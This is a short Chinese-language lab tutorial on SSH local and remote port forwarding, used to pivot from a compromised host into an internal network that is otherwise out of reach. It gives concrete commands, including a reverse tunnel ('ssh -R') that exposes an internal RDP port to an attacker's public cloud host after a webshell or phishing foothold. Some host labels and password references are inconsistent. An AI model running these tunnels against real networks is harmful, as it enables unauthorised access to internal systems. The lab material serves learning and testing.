SSH介绍
SSH通过网络远程访问主机提供保护,可以对客户端和服务端之间的数据传输进行压缩和加密,有身份验证、SCP、SFTP、和端口转发的功能
SSH转发常用的参数介绍:
-C | 请求压缩所有数据 |
---|---|
-D | 动态转发、即socks代理 |
-f | 后台执行SSH指令 |
-g | 允许远程主机连接主机的转发端口 |
-L | 本地转发 |
-N | 不执行远程指令,处于等待状态 |
-R | 远程转发 |
1、本地转发(正向访问A)
实验场景
现在有如下的网络,电脑A是攻击机器,可以直接访问电脑B,但是访问不了机器C,可以借助B机器上的SSH命令进行端口转发访问机器C
机器名字 | 机器IP | 机器类型 |
---|---|---|
攻击机器 | 192.168.1.5 | windwos10 |
官网机器 | 192.168.41.137/192.168.57.129 | centos7 |
内网机器 | 192.168.57.128 | wn7 |
网络情况如下:
A可以访问B B可以访问C A不能访问C
实验步骤
1、使用webshell或者其他其他的方式连接到B机器
2、使用转发的命令进行转发
ssh -CfNg -L 本地端口:主机B_IP:主机B_端口 跳板主机A_IP 例如: ssh -CfNg -L 3333:192.168.57.128:3389 192.168.41.137,然后输入151的密码即可
3、访问跳板机器的3333端口就可以访问内网机器的3389端口
2、远程转发(反向访问A)
实验场景
攻击机者已经拿下了机器B 但是因为是内网机器所以无法直接访问,同时无法访问c主机,但是因为b有ssh,我们使用远程转发
机器信息
机器名字 | 机器IP | 机器类型 |
---|---|---|
攻击机器 | 175.178.176.251 | 腾讯云 |
官网机器 | 192.168.41.137/192.168.57.129 | centos7 |
内网机器 | 192.168.36.135 | centos7 |
网络情况如下:
B可以访问A B可以访问C A访问不了B
实验步骤
1、通过反向连接(钓鱼)的方式连入公司的网络
2、在机器上执行如下的转发命令
ssh -CfNg -R 攻击者端口:目标主机IP:目标主机端口 -fN 攻击者_IP
例如: ssh -CfNg -R 54:192.168.41.137:3389 175.178.176.251 然后输入226的密码即可
3、在攻击的机器上访问端口就可以了(这里只能本地访问)